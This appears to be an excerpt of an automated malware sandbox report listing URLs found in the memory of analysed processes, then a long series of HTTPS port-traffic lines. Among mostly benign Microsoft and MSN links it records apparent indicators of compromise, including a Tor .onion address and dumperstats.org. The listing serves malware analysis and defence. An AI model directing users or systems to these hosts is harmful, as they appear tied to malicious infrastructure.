Source: explorer.exe, 00000001.00000000.1680983414.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
Source: explorer.exe, 00000001.00000000.1680983414.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
Source: explorer.exe, 00000001.00000000.1680983414.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
Source: csrss.exe, 0000001C.00000002.4252167352.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: csrss.exe, 0000001C.00000002.4252167352.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://curl.se/docs/hsts.html
Source: csrss.exe, 0000001C.00000002.4252167352.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: 4E3.exe, 0000001D.00000002.4257859300.000000000C08C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://dumperstats.org
Source: 4E3.exe, 0000001D.00000002.4257859300.000000000C0E6000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://dumperstats.orghttp://c43tnmrkzfmkjyd3j4v6xbyrd67q6pskzy67dwkzj36uoqwpoju2loyd.onionSoftware
Source: 4E3.exe, 0000001D.00000002.4257859300.000000000C08C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://dumperstats.orghttps://dumperstats.orgRegQueryValueExWhttps://dumperstats.orgUUIDUUIDPGDSE
Source: explorer.exe, 00000001.00000000.1684862545.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/woocommerce/woocommerce-gutenberg-products-block/pull/5059
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gmpg.org/xfn/11
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com
Source: explorer.exe, 00000001.00000000.1680983414.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000001.00000000.1680983414.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
Source: explorer.exe, 00000001.00000000.1680983414.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
Source: explorer.exe, 00000001.00000000.1680983414.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
Source: explorer.exe, 00000001.00000000.1680983414.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
Source: explorer.exe, 00000001.00000000.1680983414.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
Source: explorer.exe, 00000001.00000000.1680983414.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ogp.me/ns#
Source: explorer.exe, 00000001.00000000.1684862545.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com_
Source: explorer.exe, 00000001.00000000.1684862545.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: CA65.exe, 00000007.00000003.2817663934.0000000002A30000.00000004.00000020.00020000.00000000.sdmp, CA65.exe, 00000007.00000003.2804986734.0000000003867000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sabotage.net
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://schema.org/
Source: D217.exe, 00000008.00000003.1993451846.0000000003764000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: explorer.exe, 00000001.00000000.1680983414.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
Source: CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://static.klaviyo.com/onsite/js/klaviyo.js?company_id=QWK2SK
Source: csrss.exe, 0000001C.00000002.4252167352.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://trac.torproject.org/projects/tor/ticket/14917.
Source: explorer.exe, 00000001.00000000.1680983414.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000001.00000000.1680983414.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000001.00000000.1684862545.000000000C557000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/L
Source: explorer.exe, 00000001.00000000.1684862545.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: D217.exe, 00000008.00000003.2014962700.00000000019DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: explorer.exe, 00000001.00000000.1680983414.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
Source: explorer.exe, 00000001.00000000.1680983414.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
Source: explorer.exe, 00000001.00000000.1680983414.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1680983414.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
Source: explorer.exe, 00000001.00000000.1680983414.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
Source: explorer.exe, 00000001.00000000.1680983414.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
Source: explorer.exe, 00000001.00000000.1680983414.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
Source: explorer.exe, 00000001.00000000.1680983414.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
Source: explorer.exe, 00000001.00000000.1680983414.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
Source: explorer.exe, 00000001.00000000.1680983414.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
Source: explorer.exe, 00000001.00000000.1680983414.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
Source: explorer.exe, 00000001.00000000.1680983414.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
Source: explorer.exe, 00000001.00000000.1680983414.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
Source: explorer.exe, 00000001.00000000.1680983414.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
Source: explorer.exe, 00000001.00000000.1680983414.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000001.00000000.1680983414.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
Source: explorer.exe, 00000001.00000000.1680983414.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
Source: csrss.exe, 0000001C.00000002.4252167352.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.torproject.org/
Source: csrss.exe, 0000001C.00000002.4252167352.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.torproject.org/documentation.html

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 64811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51828
Source: unknown	Network traffic detected: HTTP traffic on port 59024 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61064 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55197
Source: unknown	Network traffic detected: HTTP traffic on port 58856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55194
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63804
Source: unknown	Network traffic detected: HTTP traffic on port 53844 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49210 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52599 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55016 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61271 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57312 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50980
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59567
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61877
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61878
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62967
Source: unknown	Network traffic detected: HTTP traffic on port 61878 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63816
Source: unknown	Network traffic detected: HTTP traffic on port 57611 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50980 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54460 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50991
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59576
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59333
Source: unknown	Network traffic detected: HTTP traffic on port 55440 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52129 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61641
Source: unknown	Network traffic detected: HTTP traffic on port 50280 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54126 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62161 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59333 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59587
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61897
Source: unknown	Network traffic detected: HTTP traffic on port 50396 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59583
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63837
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49947
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61896
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59509
Source: unknown	Network traffic detected: HTTP traffic on port 59596 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52368 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52689 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59034 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60471 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50944
Source: unknown	Network traffic detected: HTTP traffic on port 53819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58425
Source: unknown	Network traffic detected: HTTP traffic on port 51561 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56249
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59515
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56253
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 57978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53891 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61499 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57598
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61849
Source: unknown	Network traffic detected: HTTP traffic on port 54973 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51986 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55014 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50969
Source: unknown	Network traffic detected: HTTP traffic on port 56344 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58447
Source: unknown	Network traffic detected: HTTP traffic on port 58592 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59538
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58454
Source: unknown	Network traffic detected: HTTP traffic on port 50969 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55223 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61857
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62948
Source: unknown	Network traffic detected: HTTP traffic on port 57701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58451
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53848
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54937
Source: unknown	Network traffic detected: HTTP traffic on port 49162 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53849
Source: unknown	Network traffic detected: HTTP traffic on port 50392 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53844
Source: unknown	Network traffic detected: HTTP traffic on port 57453 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54382 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59155
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62796
Source: unknown	Network traffic detected: HTTP traffic on port 54193 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64734
Source: unknown	Network traffic detected: HTTP traffic on port 65205 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54945
Source: unknown	Network traffic detected: HTTP traffic on port 57064 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50340
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53851
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53850
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53853
Source: unknown	Network traffic detected: HTTP traffic on port 54255 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62462 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57682 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54421 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51023 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61009
Source: unknown	Network traffic detected: HTTP traffic on port 60182 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59170
Source: unknown	Network traffic detected: HTTP traffic on port 57606 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54967
Source: unknown	Network traffic detected: HTTP traffic on port 53817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54966
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54965
Source: unknown	Network traffic detected: HTTP traffic on port 61009 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50897 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54964
Source: unknown	Network traffic detected: HTTP traffic on port 59576 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53893 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64763
Source: unknown	Network traffic detected: HTTP traffic on port 50340 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61499
Source: unknown	Network traffic detected: HTTP traffic on port 58545 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54452 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57495 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59509 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55021 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62637 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63844
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62759
Source: unknown	Network traffic detected: HTTP traffic on port 64801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59596
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57175
Source: unknown	Network traffic detected: HTTP traffic on port 53848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64930
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61664
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63842
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53815
Source: unknown	Network traffic detected: HTTP traffic on port 55700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53819
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53818
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53817
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53816
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64944
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63615
Source: unknown	Network traffic detected: HTTP traffic on port 64930 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59123
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56098
Source: unknown	Network traffic detected: HTTP traffic on port 50141 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53827
Source: unknown	Network traffic detected: HTTP traffic on port 63799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50394 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54464 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62148 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59135
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64958
Source: unknown	Network traffic detected: HTTP traffic on port 58941 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59131
Source: unknown	Network traffic detected: HTTP traffic on port 53580 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54965 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53834
Source: unknown	Network traffic detected: HTTP traffic on port 58649 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55194 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56661 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62369 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57066 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55265 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64727
Source: unknown	Network traffic detected: HTTP traffic on port 62126 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59144
Source: unknown	Network traffic detected: HTTP traffic on port 54303 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58451 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49349
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54418
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54417
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55653 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52089 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63368
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62037
Source: unknown	Network traffic detected: HTTP traffic on port 57547 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62155 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59247 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54421
Source: unknown	Network traffic detected: HTTP traffic on port 59144 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53580
Source: unknown	Network traffic detected: HTTP traffic on port 55034 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56519 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54418 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49287
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49286
Source: unknown	Network traffic detected: HTTP traffic on port 51566 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57702
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57701
Source: unknown	Network traffic detected: HTTP traffic on port 54191 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52263
Source: unknown	Network traffic detected: HTTP traffic on port 50733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55230 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56657 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53356
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53354
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57715
Source: unknown	Network traffic detected: HTTP traffic on port 58815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54448
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52270
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54452
Source: unknown	Network traffic detected: HTTP traffic on port 51083 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 65204 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55704
Source: unknown	Network traffic detected: HTTP traffic on port 54257 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55700
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64659
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64658
Source: unknown	Network traffic detected: HTTP traffic on port 64658 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54967 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58542 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64944 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52201
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53530
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55713
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52689
Source: unknown	Network traffic detected: HTTP traffic on port 56588 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57068 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61155
Source: unknown	Network traffic detected: HTTP traffic on port 54945 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49433 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53787
Source: unknown	Network traffic detected: HTTP traffic on port 60922 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50280
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 65522
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50285
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55735
Source: unknown	Network traffic detected: HTTP traffic on port 54373 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54888
Source: unknown	Network traffic detected: HTTP traffic on port 60698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50294
Source: unknown	Network traffic detected: HTTP traffic on port 57454 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57697 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63352
Source: unknown	Network traffic detected: HTTP traffic on port 54328 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61664 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54258
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58858
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58857
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54257
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54255
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59700
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58856
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54261
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52083
Source: unknown	Network traffic detected: HTTP traffic on port 54250 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62037 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58343 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60936
Source: unknown	Network traffic detected: HTTP traffic on port 54937 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52270 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54266
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52089
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56696
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59962
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52097
Source: unknown	Network traffic detected: HTTP traffic on port 52097 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60700
Source: unknown	Network traffic detected: HTTP traffic on port 54456 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 65173
Source: unknown	Network traffic detected: HTTP traffic on port 61897 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55225 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56455
Source: unknown	Network traffic detected: HTTP traffic on port 64727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57547
Source: unknown	Network traffic detected: HTTP traffic on port 50099 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61800
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55133
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57312
Source: unknown	Network traffic detected: HTTP traffic on port 54377 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57550
